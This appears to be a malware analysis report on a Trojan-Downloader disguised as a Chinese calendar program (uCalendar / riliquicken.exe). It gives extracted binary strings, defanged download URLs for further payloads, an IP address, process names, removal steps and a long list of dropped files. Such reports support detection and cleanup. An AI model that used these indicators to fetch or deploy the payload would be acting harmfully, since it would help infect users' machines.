.PAVCException@@
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\uCalendar.exe
(*8\(*8\(*8\(*8\
(*8\(*8\
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\
Calendar.exe
.KA28/'
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
=*=/=4=:=
3 3$3(3,3034383
0*00070^0{0
5-555_5{5
2-252_2{2
?-?5?_?{?
404<4[4~4
0-0}0
999@99:@:
7*838`8{8
6$6(6,6064686<6@6
5-5T5}5
< =2=8=_=
: :$:(:,:0:
3?4
5&757&<6<]<}<
9 9$9(9,9094989<9
7(7@7\7|7
accKeyboardShortcut
ekernel32.dll
mscoree.dll
KERNEL32.DLL
5555443332
05555443332
5555443332
(*.*)
uCalendar.exe

riliquicken.exe_408:

.text
`.rdata
@.data
.rsrc
@.reloc
L$`QSSh
SWSSSh
tGHt.Ht&
CNotSupportedException
%s (%s:%d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
comctl32.dll
comdlg32.dll
shell32.dll
ole32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
hhctrl.ocx
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
commctrl_DragListMsg
CCmdTarget
Broken pipe
Inappropriate I/O control operation
Operation not permitted
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
operator
GetProcessWindowStation
USER32.DLL
HTTP/1.0
https
No start tag for end tag '%s' at offset %d
End tag '%s' at offset %d does not match start tag '%s' at offset %d
Element '%s' at offset %d not ended
%s at offset %d unterminated
Incorrect %s at offset %d
hXXp://update.xiaoxinrili.com/daohang/sj.xml
Microsoft Windows NT 4.0
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows Me
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003
Microsoft Windows Server 2003 R2
Microsoft Windows Vista
Microsoft Windows Server 2008
Microsoft Windows 7
Microsoft Windows Server 2008 R2
hXXp://update.xiaoxinrili.com/riliser.exe
http\shell\open\command
Applications\iexplore.exe\shell\open\command
\xiaomama1.ico
\iiie.ico
file.transfer.update
file.transfer.complete
device.state.changed
device.list.changed
install.apk.complete
adb.shell.complete
100000511
hXXp://update.xiaoxinrili.com/daohang/tubiao.xml
Ads_Url
taskbarurl
IENAV_PElnkurl
IENAV_shell_changeurl
hXXp://
C:\quxiu1_.lnk
C:\quxiu2_.lnk
URL=[url]
HotKey=0
[url]
hXXp://update.xiaoxinrili.com/daohang/yx.xml
Ads_Exe
appurl
hXXp://update.xiaoxinrili.com/InstProtect.txt
uCalendar.exe
wdj_connection_wrapper.dll
adb\adb.exe
riliser.exe
data\Config.ini
SeeUpdate.exe
183.61.9.60
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT)
X-
e:\rili_App\riliInstall\BIN\riliquicken.pdb
KERNEL32.dll
USER32.dll
RegOpenKeyExA
RegCloseKey
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
SHLWAPI.dll
HttpOpenRequestA
HttpAddRequestHeadersA
HttpSendRequestA
HttpQueryInfoA
WININET.dll
WS2_32.dll
URLDownloadToFileA
urlmon.dll
IPHLPAPI.DLL
OLEACC.dll
GetCPInfo
GetConsoleOutputCP
GetProcessHeap
UnhookWindowsHookEx
GetKeyState
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GDI32.dll
WINSPOOL.DRV
COMDLG32.dll
OLEAUT32.dll
.PAVCOleException@@
.PAVCObject@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.PAVCArchiveException@@
.PAVCFileException@@
.?AVCCmdTarget@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
zcÁ
.?AVGenericHTTPClient@@
.PAVCException@@
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\riliquicken.exe
%original file name%.exe
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\
iliquicken.exe
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
7q7D7L7
7.747:7@7
0$0(0,000
2)2\263~3
: :;:]:}:
3 3$3(3,30343~3
5 5$5(5,5
> ><>@>`>
accKeyboardShortcut
kernel32.dll
mscoree.dll
KERNEL32.DLL
devid: %s id: %d install success = %d, error_info=%s
riliquicken.exe


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    attrib.exe:1168
    attrib.exe:1520
    %original file name%.exe:2040
    riliquicken.exe:408
    6acad04bb03501dc920778ed12ba6d63.tmp:560
    uCalendar.exe:1840

  2. Delete the original Trojan-Downloader file.
  3. Delete or disinfect the following files created/modified by the Trojan-Downloader:

    %Documents and Settings%\%current user%\Local Settings\Temp\is-4FAI5.tmp\6acad04bb03501dc920778ed12ba6d63.tmp (7386 bytes)
    %Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\adb_dev.dll (129151 bytes)
    %Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\DriverInstallerX86.exe (23636 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wdj2.tmp (9730 bytes)
    %Documents and Settings%\%current user%\My Documents\xiaomama1.ico (4672 bytes)
    %Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\wdj_connection.dll (524674 bytes)
    %Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\DriverInstallerX64.exe (26068 bytes)
    %Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\version (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Icon_1[1].ico (11345 bytes)
    %Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\ssleay32.dll (35828 bytes)
    %Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\libcurl.dll (40972 bytes)
    %Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\wdjconx86.exe (7772 bytes)
    %Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\WDJDriverInstaller.exe (7772 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wdj1.tmp (91 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\data\Config.ini (920 bytes)
    %Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\wdjconx64.exe (12588 bytes)
    %Documents and Settings%\%current user%\Application Data\WDJConnEngine\2.69.0.5490\libeay32.dll (131173 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-EACIG.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BO590.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-EUT2I.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-R2SHE.tmp (341 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-VUE7K.tmp (854 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CITBH.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-I07M1.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UQKI3.tmp (972 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-E3NQ3.tmp (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-J9IO1.tmp (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-T5GBV.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-45E9P.tmp (571 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UT2U1.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FSAKH.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-H9PQM.tmp (372 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-HBFP8.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MS510.tmp (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-P460L.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FA3VP.tmp (308 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ATVIR.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-JMCVI.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\c[1].php (1177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0DT6F.tmp (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GG746.tmp (799 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6ABIJ.tmp (418 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UB0UL.tmp (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CA7DT.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-H5M3H.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3GBDV.tmp (41 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-JC94V.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8P1G7.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-4F4V4.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-S5K1J.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NM4TE.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9K96Q.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-HSHNI.tmp (680 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NC7K8.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-8TDL0.tmp (42 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-A8EAG.tmp (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-EAR7G.tmp (846 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RDQEM.tmp (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-O8MRK.tmp (399 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-7T15P.tmp (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\小新日历.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-B31VB.tmp (676 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8Q63L.tmp (570 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-5VQIL.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3GS5K.tmp (211 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9BQPC.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BN1AB.tmp (954 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\botva2.dll (35 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-257BU.tmp (1425 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\CallbackCtrl.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Internet Explorer\MSIMGSIZ.DAT (192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-B22SN.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-KKAGK.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-4A2KS.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-5UAA5.tmp (29 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-M2S8M.tmp (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GA32U.tmp (713 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7RVE9.tmp (921 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-K5UU2.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GN5N1.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-1Q822.tmp (395 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CHN29.tmp (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\xttj[1].htm (792 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-AU387.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-9OFM7.tmp (61 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-59Q2H.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RQAU1.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S5QPM.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-F61GP.tmp (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-EM3D2.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-PAS5F.tmp (528 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-JCVVM.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MB7TH.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DPTNS.tmp (28 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-USMNK.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-84K0R.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FODVB.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UF6NE.tmp (566 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-JVH2E.tmp (792 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-PEHSU.tmp (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\unins000.dat (77177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SOF93.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BD63S.tmp (46 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RE4AE.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-47L4D.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-TOHRA.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-KPEV6.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-82AQ4.tmp (1 bytes)
    %Documents and Settings%\All Users\Application Data\Icons\ab091a108ba11a214cb2497830748b5a.ico (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OIK1B.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LM96A.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2UJR7.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BFVNJ.tmp (309 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-T7SDK.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DMUUF.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-NQK6G.tmp (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-179PC.tmp (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-VKG5F.tmp (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-64LEO.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8IFBJ.tmp (46 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-19FF6.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0UA5R.tmp (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CK9D1.tmp (833 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-04CEU.tmp (615 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-KSVR2.tmp (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0IGTG.tmp (873 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-N3NUO.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\WListViewEx.dll (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3ID9I.tmp (398 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SNKL9.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-589D2.tmp (457 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NK9JL.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DIS2A.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SIE6F.tmp (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-VDS88.tmp (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RQ06S.tmp (396 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-15K0J.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-26K4C.tmp (613 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\data\is-F0AFL.tmp (32 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ODTLG.tmp (394 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-P4A60.tmp (13 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (4820 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-A0EIM.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RNBC6.tmp (395 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LL8KV.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LN8C3.tmp (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-KLVNJ.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DFOPO.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MKQ0P.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CTVUM.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FLS7N.tmp (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\WSysInfo.dll (42 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6BKNI.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-B6BC5.tmp (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-J7PLB.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-TKKFL.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-P73ID.tmp (449 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V911M.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-K3A0H.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LFOCI.tmp (891 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S329D.tmp (943 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-ACG6D.tmp (35 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IDDQ0.tmp (531 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-TBR47.tmp (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\info.iam (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DC97P.tmp (857 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RELD2.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-TLJE9.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-99O8Q.tmp (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-VP4MN.tmp (437 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IGNP2.tmp (46 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NM9J5.tmp (949 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6H2UT.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0L13V.tmp (871 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\_isetup\_shfoldr.dll (23 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-N5L7C.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-A4S61.tmp (474 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2K1SC.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DAG71.tmp (290 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FPQV4.tmp (991 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\ItDownload_wex.dll (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\stat[1].php (1177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BM7CV.tmp (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-URB1U.tmp (820 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-QDAFG.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DO1SP.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-U18FV.tmp (896 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-U189L.tmp (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FMB0Q.tmp (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DRCF3.tmp (643 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\16246473[1].js (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-4J0MN.tmp (7547 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-PCUV5.tmp (523 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\core[1].php (750 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-QJ7LF.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-4P8GP.tmp (986 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6856F.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-AIMV2.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SUTI1.tmp (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9IE2G.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2AFEU.tmp (298 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OUGF5.tmp (285 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-AIDQ3.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-JCB5A.tmp (605 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OR4OD.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CHIVK.tmp (1 bytes)
